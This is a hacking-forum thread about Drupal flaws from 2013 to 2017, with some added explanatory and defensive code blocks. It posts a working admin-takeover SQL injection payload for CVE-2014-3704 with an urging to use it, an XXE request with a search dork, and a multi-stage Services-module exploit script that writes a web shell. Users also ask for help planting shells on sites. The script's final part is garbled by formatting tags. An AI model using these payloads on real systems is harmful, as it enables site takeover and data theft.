03.11.2013, 22:12
Guest
Posts: n/a
Time spent on forum: 0
Reputation: 0

ZeR0ChanNeL said:
drupal 7.15, path disclosure

Works on Drupal 7.22 too; it looks like it affects the whole 7 branch.

09.12.2013, 19:26
Guest
Posts: n/a
Time spent on forum: 70690
Reputation: -5

Can someone tell me how to upload a shell to this version, Drupal 6.22?
I have admin panel access.
The standard methods didn't help.

16.10.2014, 16:21
Banned
Registered: 21.11.2007
Posts: 181
Time spent on forum: 1066435
Reputation: 1013

CVE-2014-3704 Drupal 7.0 – 7.31 pre-auth SQL Injection Vulnerability
lol
https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
Code:
SektionEins GmbH
www.sektioneins.de
-= Security Advisory =-
Advisory: Drupal - pre-auth SQL Injection Vulnerability
Release Date: 2014/10/15
Last Modified: 2014/10/15
Author: Stefan Horst [stefan.horst[at]sektioneins.de]
Application: Drupal >= 7.0

protected function expandArguments(&$query, &$args) {
  $modified = FALSE;
  foreach (array_filter($args, 'is_array') as $key => $data) {
    $new_keys = array();
    foreach ($data as $i => $value) {
      // This assumes that there are no other placeholders that use the same
      // name. For example, if the array placeholder is defined as :example
      // and there is already an :example_2 placeholder, this will generate
      // a duplicate key. We do not account for that as the calling code
      // is already broken if that happens.
      $new_keys[$key . '_' . $i] = $value;
    }
    // Update the query with the new placeholders.
    // preg_replace is necessary to ensure the replacement does not affect
    // placeholders that start with the same exact text. For example, if the
    // query contains the placeholders :foo and :foobar, and :foo has an
    // array of values, using str_replace would affect both placeholders,
    // but using the following preg_replace would only affect :foo because
    // it is followed by a non-word character.
    $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    // Update the args array with the new placeholders.
    unset($args[$key]);
    $args += $new_keys;
    $modified = TRUE;
  }
  return $modified;
}

The function assumes that it is called with an array which has no keys. Example:

  db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2')));

Which results in this SQL Statement

  SELECT * from users where name IN (:name_0, :name_1)

with the parameters name_0 = user1 and name_1 = user2.

The Problem occurs, if the array has keys, which are no integers. Example:

  db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test -- ' => 'user1','test' => 'user2')));

this results in an exploitable SQL query:

  SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1

with parameters :name_test = user2.

Since Drupal uses PDO, multi-queries are allowed. So this SQL Injection can
be used to insert arbitrary data in the database, dump or modify existing data
or drop the whole database.

With the possibility to INSERT arbitrary data into the database an
attacker can execute any PHP code through Drupal features with callbacks.

Patch:

  $new_keys = array();
  foreach (array_values($data) as $i => $value) {
    // This assumes that there are no other placeholders that use the same
    // name. For example, if the array placeholder is defined as :example
    // and there is already an :example_2 placeholder, this will generate
    // a duplicate key. We do not account for that as the calling code
    // is already broken if that happens.
    $new_keys[$key . '_' . $i] = $value;
  }

Proof of Concept:
SektionEins GmbH has developed a proof of concept, but was asked by
Drupal to postpone the release.

Disclosure Timeline:
16. Sep. 2014 - Notified the Drupal devs via security contact form
15. Oct. 2014 - Release of Bugfix by Drupal core Developers

poc:
Code:
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
and it really does work
go for it, hackers
exploit:
http://pastebin.com/nDwLFV3v
video: http://www.youtube.com/watch?v=rHwJYD_yTlM
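
Added example, not part of the post above and not Drupal core code: the expansion logic quoted in the advisory, reduced to a standalone function so the pre-patch and patched behaviour can be compared without a database, using only the advisory's own two inputs. The names `expand_arguments` and `unsafe_placeholders` and the `$patched` switch are assumptions made for this illustration.

```php
<?php
// Added example, not Drupal core. Inputs are the two arrays from the advisory.

/**
 * Expands array-valued placeholders as in the quoted function.
 *
 * $patched = FALSE keeps the array's own keys (the 7.0 - 7.31 behaviour);
 * $patched = TRUE renumbers them with array_values() (the advisory's patch).
 */
function expand_arguments(string &$query, array &$args, bool $patched): bool {
  $modified = FALSE;
  foreach (array_filter($args, 'is_array') as $key => $data) {
    $new_keys = array();
    foreach (($patched ? array_values($data) : $data) as $i => $value) {
      // The array index becomes part of the placeholder NAME, and the name
      // is what gets written into the SQL text below.
      $new_keys[$key . '_' . $i] = $value;
    }
    $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    unset($args[$key]);
    $args += $new_keys;
    $modified = TRUE;
  }
  return $modified;
}

/**
 * Returns the placeholder names that are not a colon followed by word
 * characters. Any such name has carried caller-controlled text into the
 * statement, so a data layer can refuse to prepare the query.
 */
function unsafe_placeholders(array $args): array {
  $unsafe = array();
  foreach (array_keys($args) as $name) {
    if (!preg_match('/\A:\w+\z/', (string) $name)) {
      $unsafe[] = $name;
    }
  }
  return $unsafe;
}

$inputs = array(
  'plain list'  => array('user1', 'user2'),
  'string keys' => array('test -- ' => 'user1', 'test' => 'user2'),
);

foreach (array(FALSE, TRUE) as $patched) {
  foreach ($inputs as $label => $value) {
    $query = 'SELECT * FROM {users} WHERE name IN (:name)';
    $args = array(':name' => $value);
    expand_arguments($query, $args, $patched);

    printf("%-9s | %-11s | %s\n", $patched ? 'patched' : 'pre-patch', $label, $query);
    printf("%23s bound: %s\n", '', json_encode($args));
    $unsafe = unsafe_placeholders($args);
    if ($unsafe) {
      printf("%23s non-identifier placeholder names: %s\n", '', json_encode($unsafe));
    }
  }
}
```

Only the pre-patch run with string keys produces a placeholder name that fails the identifier check; after `array_values()` the same input expands to `:name_0, :name_1` like an ordinary list.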

16.01.2015, 11:10
Guest
Posts: n/a
Time spent on forum: 193811
Reputation: 724

20.03.2015, 18:49
Guest
Posts: n/a
Time spent on forum: 193811
Reputation: 724

Open redirect and authorization bypass. There are serious limitations when it comes to exploitation.
https://www.drupal.org/SA-CORE-2015-001
Bypass (modules/user/user.module)
Before
PHP:
function user_pass_rehash($password, $timestamp, $login) {
  return md5($timestamp . $password . $login);
}
After
PHP:
function user_pass_rehash($password, $timestamp, $login, $uid) {
  // Backwards compatibility: Try to determine a $uid if one was not passed.
  // (Since $uid is a required parameter to this function, a PHP warning will
  // be generated if it's not provided, which is an indication that the calling
  // code should be updated. But the code below will try to generate a correct
  // hash in the meantime.)
  if (!isset($uid)) {
    $uids = array();
    $result = db_query_range("SELECT uid FROM {users} WHERE pass = '%s' AND login = '%s' AND uid > 0", $password, $login, 0, 2);
    while ($row = db_fetch_array($result)) {
      $uids[] = $row['uid'];
    }
    // If exactly one user account matches the provided password and login
    // timestamp, proceed with that $uid.
    if (count($uids) == 1) {
      $uid = reset($uids);
    }
    // Otherwise there is no safe hash to return, so return a random string
    // that will never be treated as a valid token.
    else {
      return drupal_random_key();
    }
  }
  return drupal_hmac_base64($timestamp . $login . $uid, drupal_get_private_key() . $password);
}
ORed (includes/bootstrap.inc)
PHP:
// Sanitize the destination parameter (which is often used for redirects)
// to prevent open redirect attacks leading to other domains. Sanitize
// both $_GET['destination'] and $_REQUEST['destination'] to protect code
// that relies on either, but do not sanitize $_POST to avoid interfering
// with unrelated form submissions. $_REQUEST['edit']['destination'] is
// also sanitized since drupal_goto() will sometimes rely on it, and
// other code might therefore use it too. The sanitization happens here
// because menu_path_is_external() requires the variable system to be
// available.
if (isset($_GET['destination']) || isset($_REQUEST['destination']) || isset($_REQUEST['edit']['destination'])) {
  require_once './includes/menu.inc';
  drupal_load('module', 'filter');
  // If the destination is an external URL, remove it.
  if (isset($_GET['destination']) && menu_path_is_external($_GET['destination'])) {
    unset($_GET['destination']);
    unset($_REQUEST['destination']);
  }
  // If there's still something in $_REQUEST['destination'] that didn't
  // come from $_GET, check it too.
  if (isset($_REQUEST['destination']) && (!isset($_GET['destination']) || $_REQUEST['destination'] != $_GET['destination']) && menu_path_is_external($_REQUEST['destination'])) {
    unset($_REQUEST['destination']);
  }
  // Check $_REQUEST['edit']['destination'] separately.
  if (isset($_REQUEST['edit']['destination']) && menu_path_is_external($_REQUEST['edit']['destination'])) {
    unset($_REQUEST['edit']['destination']);
  }
}
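
Added example, not part of the post above and not Drupal code: what the extra `$uid` argument and the keyed HMAC change in `user_pass_rehash()`, shown as an audit over account rows. The account rows, the request timestamp and the private key are constructed; `hmac_base64()` is a stand-in for `drupal_hmac_base64()`, and `shared_tokens()` is a hypothetical helper.

```php
<?php
// Added example. All account data and the private key below are constructed.

// Token as computed by the "before" version in the post: no server secret,
// and nothing that identifies the account.
function rehash_before($password, $timestamp, $login) {
  return md5($timestamp . $password . $login);
}

// Stand-in for drupal_hmac_base64(): URL-safe base64 of an HMAC-SHA256.
function hmac_base64($data, $key) {
  $hmac = base64_encode(hash_hmac('sha256', $data, $key, TRUE));
  return strtr($hmac, array('+' => '-', '/' => '_', '=' => ''));
}

// Token as computed by the "after" version: keyed with the site's private
// key and bound to the uid it was issued for.
function rehash_after($password, $timestamp, $login, $uid, $private_key) {
  return hmac_base64($timestamp . $login . $uid, $private_key . $password);
}

/**
 * Groups accounts by the token $token_for() yields and returns the uid
 * groups that share one token, i.e. accounts for which a reset link issued
 * to one member would also validate for the others.
 */
function shared_tokens(array $accounts, callable $token_for) {
  $by_token = array();
  foreach ($accounts as $account) {
    $by_token[$token_for($account)][] = $account['uid'];
  }
  return array_values(array_filter($by_token, function ($uids) {
    return count($uids) > 1;
  }));
}

$private_key = 'constructed-private-key';
$timestamp = 1426870140;  // constructed time of the reset request

// uid 11 and 12 carry the same stored hash and the same last-login value,
// the situation the patched code's "exactly one user account matches" check
// guards against.
$accounts = array(
  array('uid' => 11, 'pass' => 'constructed-hash-A', 'login' => 0),
  array('uid' => 12, 'pass' => 'constructed-hash-A', 'login' => 0),
  array('uid' => 13, 'pass' => 'constructed-hash-B', 'login' => 1426000000),
);

$before = shared_tokens($accounts, function ($a) use ($timestamp) {
  return rehash_before($a['pass'], $timestamp, $a['login']);
});
$after = shared_tokens($accounts, function ($a) use ($timestamp, $private_key) {
  return rehash_after($a['pass'], $timestamp, $a['login'], $a['uid'], $private_key);
});

echo 'uid groups sharing a token, before: ', json_encode($before), "\n";
echo 'uid groups sharing a token, after:  ', json_encode($after), "\n";

// Validation side: compare in constant time, against the token for the uid
// that appears in the reset URL.
$issued_for_11 = rehash_after('constructed-hash-A', $timestamp, 0, 11, $private_key);
$expected_for_12 = rehash_after('constructed-hash-A', $timestamp, 0, 12, $private_key);
echo 'token for uid 11 accepted for uid 12: ',
  var_export(hash_equals($expected_for_12, $issued_for_11), TRUE), "\n";
```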

27.04.2015, 16:22
Guest
Posts: n/a
Time spent on forum: 193811
Reputation: 724

Pre-auth XXE in Drupal Services module, neat tricks to bypass restrictions inside
Detailed description (PDF): http://www.synacktiv.fr/ressources/s...e_services.pdf
Code:
POST /drupal7.28/?q=test/node HTTP/1.1
[...]
%evil;
]>
test
Dork: "inurl:sites/all/modules/services/servers/rest_server/"

01.12.2015, 19:11
Guest
Posts: n/a
Time spent on forum: 7480
Reputation: 0

Can anyone advise on version 7,37? Maybe someone has an exploit?

01.11.2016, 12:36
Newbie
Registered: 07.09.2009
Posts: 1
Time spent on forum: 5451
Reputation: 0

Is there anything to poke at 6.36 with?

10.02.2017, 00:58
Guest
Posts: n/a
Time spent on forum: 36068
Reputation: 0

Hi everyone
drupal 6.20. Account with administrator rights.
The standard ways of uploading a shell don't help. Can anyone suggest something else? What I have tried:
1) Enabled PHP filter in the modules
2) At site/admin/settings/filters/ => Access denied You are not authorized to access this page.
That means I can no longer enable the php format, and so when adding blocks or pages the php format can't be selected... This method is a bust
3) I can't upload themes
4) There is imce. I upload php => it gets renamed to php_.txt. I upload .php3 => it gets downloaded
I upload .shtml - it opens fine, but only the html part is visible, the php code is not executed, everything is interpreted as html.
5) I tried, again through imce, to upload .htaccess so that php3 files would not be downloaded. No luck, it gets renamed to htaccess.
So I don't know what else to do
Any suggestions?

09.03.2017, 22:24
Fail
Registered: 17.09.2005
Posts: 2,242
Time spent on forum: 9089375
Reputation: 4268

DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE
Vulnerability
One of the module's features is that the input/output format can be controlled by changing the Content-Type / Accept headers. By default, the following input formats are allowed:
application/xml
application/json
multipart/form-data
application/vnd.php.serialized
Code:
POST /drupal-7.54/my_rest_endpoint/user/login HTTP/1.1
Host: vmweb.lan
Accept: application/json
Content-Type: application/vnd.php.serialized
Content-Length: 45
Connection: close

a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";}
Code:
HTTP/1.1 200 OK
Date: Thu, 02 Mar 2017 14:29:54 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
X-Content-Type-Options: nosniff
Vary: Accept
Set-Cookie: SESSaad41d4de9fd30ccb65f8ea9e4162d52=ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I; expires=Sat, 25-Mar-2017 18:03:14 GMT; Max-Age=2000000; path=/; domain=.vmweb.lan; HttpOnly
Content-Length: 635
Connection: close
Content-Type: application/json

{"sessid":"ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I","session_name":"SESSaad41d4de9fd30ccb65f8ea9e4162d52","token":"2tFysvDt1POl7jjJJSCRO7sL1rvlrnqtrik6gljggo4","user":{"uid":"1","name":"admin","mail":"admin@vmweb.lan","theme":"","signature":"","signature_format":null,"created":"1487348324","access":"1488464867","login":1488464994,"status":"1","timezone":"Europe/Berlin","language":"","picture":null,"init":"admin@vmweb.lan","data":false,"roles":{"2":"authenticated user","3":"administrator"},"rdf_mapping":{"rdftype":["sioc:UserAccount"],"name":{"predicates":["foaf:name"]},"homepage":{"predicates":["foaf:page"],"type":"rel"}}}}
Exploit:
PHP:
#!/usr/bin/php
'dixuSOspsOUU.php', 'data' => '' ];

$browser = new Browser($url . $endpoint_path);

# Stage 1: SQL Injection

class DatabaseCondition {
    protected $conditions = [
        "#conjunction" => "AND"
    ];
    protected $arguments = [];
    protected $changed = false;
    protected $queryPlaceholderIdentifier = null;
    public $stringVersion = null;

    public function __construct($stringVersion=null) {
        $this->stringVersion = $stringVersion;

        if(!isset($stringVersion)) {
            $this->changed = true;
            $this->stringVersion = null;
        }
    }
}

class SelectQueryExtender {
    # Contains a DatabaseCondition object instead of a SelectQueryInterface
    # so that $query->compile() exists and (string) $query is controlled by us.
    protected $query = null;

    protected $uniqueIdentifier = QID;
    protected $connection;
    protected $placeholder = 0;

    public function __construct($sql) {
        $this->query = new DatabaseCondition($sql);
    }
}

$cache_id = "services:$endpoint:resources";
$sql_cache = "SELECT data FROM {cache} WHERE cid='$cache_id'";
$password_hash = '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd';

# Take first user but with a custom password
# Store the original password hash in signature_format, and endpoint cache
# in signature
$query =
    "0x3a) UNION SELECT ux.uid AS uid, " .
    "ux.name AS name, '$password_hash' AS pass, " .
    "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
    "ux.pass AS signature_format, ux.created AS created, " .
    "ux.access AS access, ux.login AS login, ux.status AS status, " .
    "ux.timezone AS timezone, ux.language AS language, ux.picture " .
    "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
    "WHERE ux.uid<>(0"
;

$query = new SelectQueryExtender($query);
$data = ['username' => $query, 'password' => 'ouvreboite'];
$data = serialize($data);

$json = $browser->post(TYPE_PHP, $data);

# If this worked, the rest will as well
if(!isset($json->user)) {
    print_r($json);
    e("Failed to login with fake password");
}

# Store session and user data

$session = [
    'session_name' => $json->session_name,
    'session_id' => $json->sessid,
    'token' => $json->token
];
store('session', $session);

$user = $json->user;

# Unserialize the cached value
# Note: Drupal websites admins, this is your opportunity to fight back :)
$cache = unserialize($user->signature);

# Reassign fields
$user->pass = $user->signature_format;
unset($user->signature);
unset($user->signature_format);

store('user', $user);

if($cache === false) {
    e("Unable to obtains endpoint's cache value");
}

x("Cache contains " . sizeof($cache) . " entries");

# Stage 2: Change endpoint's behaviour to write a shell

class DrupalCacheArray {
    # Cache ID
    protected $cid = "services:endpoint_name:resources";
    # Name of the table to fetch data from.
    # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
    protected $bin = 'cache';
    protected $keysToPersist = [];
    protected $storage = [];

    function __construct($storage, $endpoint, $controller, $action) {
        $settings = [
            'services' => ['resource_api_version' => '1.0']
        ];
        $this->cid = "services:$endpoint:resources";

        # If no endpoint is given, just reset the original values
        if(isset($controller)) {
            $storage[$controller]['actions'][$action] = [
                'help' => 'Writes data to a file',
                # Callback function
                'callback' => 'file_put_contents',
                # This one does not accept "true" as Drupal does,
                # so we just go for a tautology
                'access callback' => 'is_string',
                'access arguments' => ['a string'],
                # Arguments given through POST
                'args' => [
                    0 => [
                        'name' => 'filename',
                        'type' => 'string',
                        'description' => 'Path to the file',
                        'source' => ['data' => 'filename'],
                        'optional' => false,
                    ],
                    1 => [
                        'name' => 'data',
                        'type' => 'string',
                        'description' => 'The data to write',
                        'source' => ['data' => 'data'],
                        'optional' => false,
                    ],
                ],
                'file' => [
                    'type' => 'inc',
                    'module' => 'services',
                    'name' => 'resources/user_resource',
                ],
                'endpoint' => $settings
            ];
            $storage[$controller]['endpoint']['actions'] += [
                $action => [
                    'enabled' => 1,
                    'settings' => $settings
                ]
            ];
        }

        $this->storage = $storage;
        $this->keysToPersist = array_fill_keys(array_keys($storage), true);
    }
}

class ThemeRegistry Extends DrupalCacheArray {
    protected $persistable;
    protected $completeRegistry;
}

cache_poison($endpoint, $cache);

# Write the file
$json = (array) $browser->post(TYPE_JSON, json_encode($file));

# Stage 3: Restore endpoint's behaviour

cache_reset($endpoint, $cache);

if(!(isset($json[0]) && $json[0] === strlen($file['data']))) {
    e("Failed to write file.");
}

$file_url = $url . '/' . $file['filename'];
x("File written: $file_url");

# HTTP Browser

class Browser {
    private $url;
    private $controller = CONTROLLER;
    private $action = ACTION;

    function __construct($url) {
        $this->url = $url;
    }

    function post($type, $data) {
        $headers = [
            "Accept: " . TYPE_JSON,
            "Content-Type: $type",
            "Content-Length: " . strlen($data)
        ];
        $url = $this->url . '/' . $this->controller . '/' . $this->action;
[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"](); [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_URL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPHEADER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POSTFIELDS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_SSL_VERIFYHOST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_SSL_VERIFYPEER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]); 
[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_error[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"cURL:[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]); }
return[/COLOR][COLOR="#0000BB"]json_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"]); } }
[/COLOR][COLOR="#FF8000"]# Cache
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]cache_poison[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]ThemeRegistry[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CONTROLLER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ACTION[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]cache_edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]); }
function[/COLOR][COLOR="#0000BB"]cache_reset[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]ThemeRegistry[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]cache_edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]); }
function[/COLOR][COLOR="#0000BB"]cache_edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]) { global[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([[/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]]); [/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TYPE_PHP[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]); }
[/COLOR][COLOR="#FF8000"]# Utils
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]) { print([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#DD0000"]\n"[/COLOR][COLOR="#007700"]); }
function[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]); exit([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]); }
function[/COLOR][COLOR="#0000BB"]store[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]) { [/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"].json"[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]json_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]JSON_PRETTY_PRINT[/COLOR][COLOR="#007700"])); [/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Stored[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]information in[/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]); }[/COLOR][/COLOR]
Everyone, update urgently =)
Source: Here
__________________
...
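A defensive counterpart to the script in the post above, added here and not part of the original post or of Drupal: a structural walk of a PHP-serialized request body that lists the classes `unserialize()` would instantiate, so a gateway or log review can flag bodies shaped like the `serialize([$tr])` payload the script sends. The function names and sample bodies are assumptions made for this example, and it generalizes from the single `ThemeRegistry` case to any `O:` or `C:` token.

```python
def _expect(buf, pos, ch):     # require byte ch at pos, return the next offset
    if buf[pos:pos + 1] != ch:
        raise ValueError("expected %r at offset %d" % (ch, pos))
    return pos + 1

def _num(buf, pos):            # '<digits>:' -> (value, offset after the colon)
    end = buf.index(b":", pos)
    if not buf[pos:end].isdigit():
        raise ValueError("expected a length at offset %d" % pos)
    return int(buf[pos:end]), end + 1

def _quoted(buf, pos, n):      # '"<n bytes>"' -> (bytes, offset after the quote)
    end = _expect(buf, _expect(buf, pos, b'"') + n, b'"')
    return buf[pos + 1:pos + 1 + n], end

def _walk(buf, pos, found):
    """Skip one serialized value, recording each class it would instantiate."""
    if buf[pos:pos + 2] == b"N;":
        return pos + 2
    kind, pos = buf[pos:pos + 1], _expect(buf, pos + 1, b":")
    if kind in (b"b", b"i", b"d", b"r", b"R"):
        return buf.index(b";", pos) + 1
    n, pos = _num(buf, pos)
    if kind == b"s":
        return _expect(buf, _quoted(buf, pos, n)[1], b";")
    if kind in (b"O", b"C"):
        name, pos = _quoted(buf, pos, n)
        found.append(name.decode("latin-1"))
        n, pos = _num(buf, _expect(buf, pos, b":"))
        if kind == b"C":       # custom payload is opaque: skip its n bytes
            return _expect(buf, _expect(buf, pos, b"{") + n, b"}")
    elif kind != b"a":
        raise ValueError("unknown type %r" % kind)
    pos = _expect(buf, pos, b"{")
    for _ in range(2 * n):     # key/value or property/value pairs
        pos = _walk(buf, pos, found)
    return _expect(buf, pos, b"}")

def classes_in_body(body):
    """Classes unserialize(body) would instantiate; None if not serialized data."""
    found = []
    try:
        return found if _walk(body, 0, found) == len(body) else None
    except (ValueError, RecursionError):
        return None

# Constructed request bodies (not captured traffic); property "k" is made up.
BENIGN = b'a:1:{s:4:"name";s:3:"bob";}'
WRAPPED = b'a:1:{i:0;O:13:"ThemeRegistry":1:{s:1:"k";s:1:"v";}}'
```

A non-empty result means the body asks PHP to build objects from client input; because string lengths are honoured, text that merely contains `O:13:"..."` inside a string value is not reported.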
|
|
|
|